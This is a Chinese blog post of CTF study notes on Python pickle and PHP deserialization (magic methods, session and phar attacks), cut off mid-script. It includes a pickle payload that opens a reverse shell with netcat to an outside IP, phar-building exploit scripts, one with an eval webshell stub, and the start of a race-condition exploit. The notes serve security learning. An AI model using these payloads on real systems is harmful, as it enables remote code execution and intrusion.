

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="fearless123">
  <meta name="keywords" content="">
  
    <meta name="description" content="反序列化进阶1.pythonrequests库可以写一些简单的攻击脚本了 123456789101112import requests as resimport base64url&#x3D;&quot;http:&#x2F;&#x2F;117.72.52.127:12167&#x2F;&quot;# r1&#x3D;res.get(url&#x3D;url,params&#x3D;&#123;&quot;a&quot;:123,&quot;b&quot;:456&amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="反序列化进阶">
<meta property="og:url" content="http://fearless-123.github.io/2025/10/25/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%BF%9B%E9%98%B6/index.html">
<meta property="og:site_name" content="fearless123">
<meta property="og:description" content="反序列化进阶1.pythonrequests库可以写一些简单的攻击脚本了 123456789101112import requests as resimport base64url&#x3D;&quot;http:&#x2F;&#x2F;117.72.52.127:12167&#x2F;&quot;# r1&#x3D;res.get(url&#x3D;url,params&#x3D;&#123;&quot;a&quot;:123,&quot;b&quot;:456&amp;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://fearless-123.github.io/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1761320363845-31.png">
<meta property="og:image" content="http://fearless-123.github.io/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1761320363826-28.png">
<meta property="og:image" content="http://fearless-123.github.io/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1761320363826-29.png">
<meta property="og:image" content="http://fearless-123.github.io/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1761320363826-30.png">
<meta property="article:published_time" content="2025-10-24T16:00:00.000Z">
<meta property="article:modified_time" content="2025-10-24T16:02:47.714Z">
<meta property="article:author" content="fearless123">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://fearless-123.github.io/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1761320363845-31.png">
  
  
  
  <title>反序列化进阶 - fearless123</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"fearless-123.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"OfnFQ9kB1ajL2mPoqcvGYy11-gzGzoHsz","app_key":"FxzCBhWmJYqZ3yxZGPqDOHe3","server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>fearless123</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="反序列化进阶"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-25 00:00" pubdate>
          2025年10月25日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.2k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          19 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">反序列化进阶</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="反序列化进阶"><a href="#反序列化进阶" class="headerlink" title="反序列化进阶"></a>反序列化进阶</h1><h1 id="1-python"><a href="#1-python" class="headerlink" title="1.python"></a>1.python</h1><h2 id="requests库"><a href="#requests库" class="headerlink" title="requests库"></a>requests库</h2><p>可以写一些简单的攻击脚本了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests <span class="hljs-keyword">as</span> res<br><span class="hljs-keyword">import</span> base64<br>url=<span class="hljs-string">&quot;http://117.72.52.127:12167/&quot;</span><br><span class="hljs-comment"># r1=res.get(url=url,params=&#123;&quot;a&quot;:123,&quot;b&quot;:456&#125;)  无会话状态</span><br><span class="hljs-comment"># r2=res.post(url=url,data=&#123;&quot;a&quot;:123,&quot;b&quot;:456&#125;或者json=&#123;&#125;)  注意传参使用字典的形式传参</span><br>s=res.Session()<br><span class="hljs-comment"># 先实例化一个会话类</span><br>r1=s.get(url)<br>value=base64.b64decode(base64.b64decode(r1.headers[<span class="hljs-string">&#x27;Flag&#x27;</span>]).split(<span class="hljs-string">b&quot;:&quot;</span>)[<span class="hljs-number">1</span>])<br>r2=s.post(url,data=&#123;<span class="hljs-string">&#x27;margin&#x27;</span>:value&#125;)<br><span class="hljs-built_in">print</span>(r2.text)<br><span class="hljs-comment"># 在会话状态下的请求更加合理，注意是直接填写url</span><br></code></pre></td></tr></table></figure>

<h2 id="pickle反序列化"><a href="#pickle反序列化" class="headerlink" title="pickle反序列化"></a>pickle反序列化</h2><p>pickle.dumps 序列化</p>
<p>pickle.loads 反序列化</p>
<p>关键在于对python里面的类反序列化时会触发__reduce__方法，可以在__reduce__方法里面构造恶意代码(类似于php里面的wakeup方法)</p>
<p>利用pickle反序列化实现反弹shell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> pickle<br><span class="hljs-keyword">import</span> pickletools<br><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">class</span> <span class="hljs-title class_">a</span>():<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__reduce__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-keyword">return</span> (<span class="hljs-built_in">eval</span>,(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;nc 113.45.176.xxx 900 -e /bin/sh&#x27;).read()&quot;</span>,))  <span class="hljs-comment">#,保证传给eval的是一个元组</span><br><br>m=a()<br>b=pickle.dumps(m)<br><span class="hljs-built_in">print</span>(b)<br><span class="hljs-built_in">print</span>(base64.b64encode(b))<br></code></pre></td></tr></table></figure>

<h1 id="2-反序列化"><a href="#2-反序列化" class="headerlink" title="2.反序列化"></a>2.反序列化</h1><h2 id="php反序列化"><a href="#php反序列化" class="headerlink" title="php反序列化"></a>php反序列化</h2><p>偶然间发现一个反序列化的靶场</p>
<p><a target="_blank" rel="noopener" href="https://github.com/BoyArmey/unserialize">https://github.com/BoyArmey/unserialize</a></p>
<p><img src="/../php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1761320363845-31.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>加强了对魔术方法的学习</p>
<h3 id="前置知识："><a href="#前置知识：" class="headerlink" title="前置知识："></a>前置知识：</h3><p>1.属性有三类   </p>
<p>​             public   公有的</p>
<p>​             private  私有的  只可以在子类访问，不能在类的外面访问</p>
<p>​             protected  保护的  在子类和类的外面都不能访问</p>
<p>反序列化后的结果是一个对象</p>
<p>反序列化后生成的对象中的属性值与反序列化里的值保持一致。与原来类中的属性默认值无关。</p>
<p>除了魔术方法，反序列化不会直接执行类中的成员方法，需要调用后才会执行。</p>
<ol>
<li>由于存在private和protected修饰的成员属性，因此序列化的结果中包含空字符，因此将空字符替换为%00。</li>
</ol>
<p>由于%00的存在，因此还需要进行url解码，使用urldecode()进行解码操作。</p>
<p>将解码后的$deurl_ser_dog进行反序列化操作，使用unserialize()函数实现。</p>
<p>使用var_dump()函数输出反序列化后的结果。</p>
<p>3.魔术方法：预先定义好的，在某些特定情况下自动触发的方法（函数）。</p>
<p>  简单讲：做事件A之前会自动触发事件B执行，比如张嘴吃东西，如果要吃东西必定会触发张嘴的动作。</p>
<p>  魔术方法的作用</p>
<p>  正常作用：在对类进行实例化、销毁等操作时，自动进行一些处理操作。</p>
<p>  非法作用：魔术方法会在特定条件下调用相关方法，导致触发构造好的恶意代码</p>
<h3 id="魔术方法："><a href="#魔术方法：" class="headerlink" title="魔术方法："></a>魔术方法：</h3><p>1.__construct</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Animal</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$name</span></span>)</span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;构造函数被触发&quot;</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;name = <span class="hljs-variable">$name</span>;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;name;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$animal</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Animal</span>(<span class="hljs-string">&quot;狗&quot;</span>); <span class="hljs-comment">//           实例化一个类，new一个对象就会触发construct</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>2.__destruct</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Animal</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;析构函数被触发&quot;</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$animal</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Animal</span>(); <span class="hljs-comment">// 触发析构函数</span><br><span class="hljs-variable">$$ser_animal</span> = <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$$animal</span>);<br><span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$ser_animal</span>);  <span class="hljs-comment">// 触发析构函数</span><br><br><span class="hljs-variable">$$animal</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Animal</span>();<span class="hljs-comment">//不是在声明对象时触发的析构函数，而是$$animal销毁时触发了析构函数</span><br><span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$ser_aimal</span>)<span class="hljs-comment">//是将字符串反序列化为对象，其结果也是一个对象，在对象销毁时，也会触发析构函数  </span><br>        <span class="hljs-comment">//实例化一个类，反序列化会触发（都会产生一个新的对象，对象销毁时会触发）destruct</span><br></code></pre></td></tr></table></figure>

<p>3.__sleep</p>
<p>__sleep()函数触发时机：序列化之前序列化函数serialize()函数会检查类中是否存在__sleep()魔术方法 如果存在，该方法会被优先调用，然后执行序列化操作</p>
<p>先执行__sleep()函数，然后再执行serialize()函数__sleep()函数可以用于清理对象，并返回一个数组，数组内容为对象中所有应该被序列化的变量的名称。</p>
<p>如果__sleep()没有返回任何内容，则NULL被序列化，并产生一个E_NOTICE级别的错误。 &#x2F;&#x2F;return array();</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Animal</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$age</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$price</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$name</span>,<span class="hljs-variable">$age</span>,<span class="hljs-variable">$price</span></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;name = <span class="hljs-variable">$name</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;age = <span class="hljs-variable">$age</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt;price = <span class="hljs-variable">$price</span>;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__sleep</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;name);<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$$info</span> = <span class="hljs-variable">$$_GET</span>[<span class="hljs-string">&#x27;info&#x27;</span>];<br><span class="hljs-variable">$$info</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$$info</span>);<br><span class="hljs-variable">$$animal</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Animal</span>(<span class="hljs-variable">$$info</span>-&gt;name,<span class="hljs-variable">$info</span>-&gt;age,<span class="hljs-variable">$info</span>-&gt;price);<br><span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$animal</span>);<br> <span class="hljs-comment">//将sleep删了构造name的payload</span><br></code></pre></td></tr></table></figure>

<p>4.__wakeup</p>
<p>unserialize()会检查是否存在__wakeup()方法。如果存在，则会先调用__wakeup()方法，准备对象需要的数据</p>
<p>先执行__wakeup()函数，再执行unserialize()函数</p>
<p>序列化之前执行sleep，反序列化之前执行wakeuo，反序列化之后执行destruct</p>
<p>5.__string</p>
<p>当对象被当作字符串使用时，触发__toString()函数自动执行</p>
<p>echo函数会将其当作字符串，而var_dump和print_r是当作对象输出</p>
<p>6.__invoke</p>
<p>把对象当作函数使用时，会自动触发__invoke()函数</p>
<p>$animal();,animal是一个对象</p>
<p>7.__call和__callstatic</p>
<p>__callStatic()函数在调用不可访问的静态方法时自动触发。与__call()函数相似。</p>
<p>__call：用于实例方法</p>
<p>__callStatic：用于静态方法函数原型：</p>
<p>静态方法调用：$animal::speak()</p>
<p>普通方法调用：$animal-&gt;speak()  属性也一样</p>
<p>8.__get和__set</p>
<p>get 针对调用不存在的属性  -&gt;</p>
<p>set 针对为不存在的属性赋值 &#x3D;</p>
<p>9.__isset和__unset</p>
<p>使用isset()函数或empty()函数访问类中不可访问的属性（私有属性），或不存在的属性时，会自动触发__isset()方法</p>
<p>使用unset()函数调用类中的不可访问属性$weight和不存在的属性$age时，自动触发__unset()方法</p>
<p>10.__clone</p>
<p>使用clone拷贝对象时，__clone()方法被调用</p>
<h2 id="Session-反序列化"><a href="#Session-反序列化" class="headerlink" title="Session 反序列化:"></a>Session 反序列化:</h2><p><img src="/../php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1761320363826-28.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>关键：对于php_serialize引擎来说’| ‘可能只是一个正常的字符；但对于php引擎来说’| ‘就是分隔符，前面是$_SESSION[‘username’]的键名，后面是GET参数经过serialize序列化后的值。从而在解析的时候造成了歧义，导致其在解析Session文件时直接对’ | ‘后的值进行反序列化处理。</p>
<p><strong>思路：一般是两个文件，一个文件是漏洞所在处，采用php处理器；另一个是session上传处，采用php_serialize处理器，则可利用php_serialize传入带有|的序列化payload，然后漏洞所在处用php处理器会直接对|后面的payload反序列化</strong></p>
<h2 id="phar反序列化"><a href="#phar反序列化" class="headerlink" title="phar反序列化:"></a>phar反序列化:</h2><p>参考教程:b站橙子科技</p>
<h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识:"></a>前置知识:</h3><p><img src="/../php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1761320363826-29.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p><img src="/../php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/1761320363826-30.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h3 id="有include的特殊用法"><a href="#有include的特殊用法" class="headerlink" title="有include的特殊用法:"></a>有include的特殊用法:</h3><p>还有一种存在文件包含的，可以直接上传一个压缩过的phar，然后在stub文件标识处写码实现rce，会默认解析该语句，但是一定要有phar这几个字母，才会当作phar去解压缩，识别了__HALT_COMPILER()就压缩绕过</p>
<p>如果可以使用phar:&#x2F;&#x2F;,就可以不用管后缀，.jpg也一样可以触发</p>
<p>exp:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br>@<span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-string">&#x27;test2.phar&#x27;</span>);  <span class="hljs-comment">//删除之前的test.phar文件(如果有)</span><br><span class="hljs-variable">$phar</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Phar</span>(<span class="hljs-string">&#x27;test3.phar&#x27;</span>);  <span class="hljs-comment">//创建一个phar对象，文件名必须以.phar为后缀</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setStub</span>(<span class="hljs-string">&#x27;&lt;?php @eval($_POST[123]);__HALT_COMPILER();?&gt;&#x27;</span>);  <span class="hljs-comment">//写入stub</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">addFromString</span>(<span class="hljs-string">&#x27;0&#x27;</span>, <span class="hljs-string">&#x27;0&#x27;</span>);  <span class="hljs-comment">//添加要压缩的文件</span><br><span class="hljs-variable">$gz</span>=<span class="hljs-title function_ invoke__">gzopen</span>(<span class="hljs-string">&#x27;test3.phar.gz&#x27;</span>,<span class="hljs-string">&#x27;wb&#x27;</span>);<br><span class="hljs-title function_ invoke__">gzwrite</span>(<span class="hljs-variable">$gz</span>,<span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;test3.phar&#x27;</span>));<br><span class="hljs-title function_ invoke__">gzclose</span>(<span class="hljs-variable">$gz</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点:"></a>漏洞点:</h3><p>在于phar伪协议会对上传的phar文件自动的反序列化，然后manifest部分是一段可控的序列化数据，在使用php文件操作函数时，可以使用phar:&#x2F;&#x2F;去触发这个漏洞</p>
<h3 id="条件："><a href="#条件：" class="headerlink" title="条件："></a>条件：</h3><p>​         1.可以上传一个phar文件（后缀不重要，任意后缀均可触发）</p>
<p>​         2.要有在反序列化时可以触发的魔术方法，如__destruct,__wakeup</p>
<p>​         3.要有文件操作函数，且其参数可控，如file_exists,file_put_content.file_get_content</p>
<p>​         4.没有过滤:,&#x2F;,phar等phar伪协议的关键字符</p>
<h3 id="exp："><a href="#exp：" class="headerlink" title="exp："></a>exp：</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Animal</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;name);<br>    &#125;<br>&#125;         <span class="hljs-comment">//根据实际填写类</span><br><br><br>@<span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-string">&#x27;test.phar&#x27;</span>);  <span class="hljs-comment">//删除之前的test.phar文件(如果有)</span><br><span class="hljs-variable">$phar</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Phar</span>(<span class="hljs-string">&#x27;test1.phar&#x27;</span>);  <span class="hljs-comment">//创建一个phar对象，文件名必须以.phar为后缀</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">startBuffering</span>();  <span class="hljs-comment">//开始写文件</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setStub</span>(<span class="hljs-string">&#x27;&lt;?php __HALT_COMPILER(); ?&gt;&#x27;</span>);  <span class="hljs-comment">//写入stub</span><br><span class="hljs-variable">$o</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Animal</span>(); <br><span class="hljs-variable">$o</span>-&gt;name=<span class="hljs-keyword">eval</span>(<span class="hljs-string">&quot;<span class="hljs-subst">$_GET</span>[1]&quot;</span>);    <span class="hljs-comment">//可控点</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setMetadata</span>(<span class="hljs-variable">$o</span>); <span class="hljs-comment">//写入meta-data</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">addFromString</span>(<span class="hljs-string">&#x27;test.txt&#x27;</span>, <span class="hljs-string">&#x27;test&#x27;</span>);  <span class="hljs-comment">//添加要压缩的文件</span><br><span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">stopBuffering</span>();<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p> 注意要将php.ini中的readonly选项改成Off才能正常生成phar文件</p>
<p>Web 277 条件竞争加phar反序列化</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs Python"><span class="hljs-keyword">import</span> requests <span class="hljs-keyword">as</span> res<br><span class="hljs-keyword">import</span> threading <span class="hljs-keyword">as</span> th<br>url=<span class="hljs-string">&quot;https://7dd2e80f-f714-4e61-82bb-448d2368cf53.challenge.ctf.show/&quot;</span><br>found_flag=<span class="hljs-number">0</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">readfile</span>(<span class="hljs-params">file</span>):<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">open</span>(file,<span 